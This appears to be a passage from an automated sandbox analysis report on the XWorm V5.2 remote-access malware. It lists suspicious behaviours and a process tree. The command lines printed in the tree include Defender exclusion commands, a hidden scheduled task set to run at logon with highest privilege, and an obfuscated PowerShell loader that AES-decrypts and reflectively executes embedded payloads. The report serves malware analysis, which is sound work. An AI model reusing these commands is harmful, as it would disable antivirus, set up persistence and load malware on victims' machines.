N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3584 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 3584 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 3584 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 3584 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 4692 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4692 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4692 wrote to memory of 2412 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4692 wrote to memory of 2412 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 1720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 1720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 1136 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2412 wrote to memory of 1136 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1136 wrote to memory of 3952 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1136 wrote to memory of 3952 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 3088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 3088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3952 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 3452 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1512 wrote to memory of 3348 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 2952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 2556 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 1960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1420 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1364 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1556 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 4564 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 2928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1940 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 1732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 2512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1120 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 2532 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1892 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1280 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 4420 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 1260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 2436 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 464 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 2432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 1832 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 1772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 2208 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 2404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 2200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 2392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 1600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 3568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_599_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 564 -p 5096 -ip 5096

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5096 -s 1016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

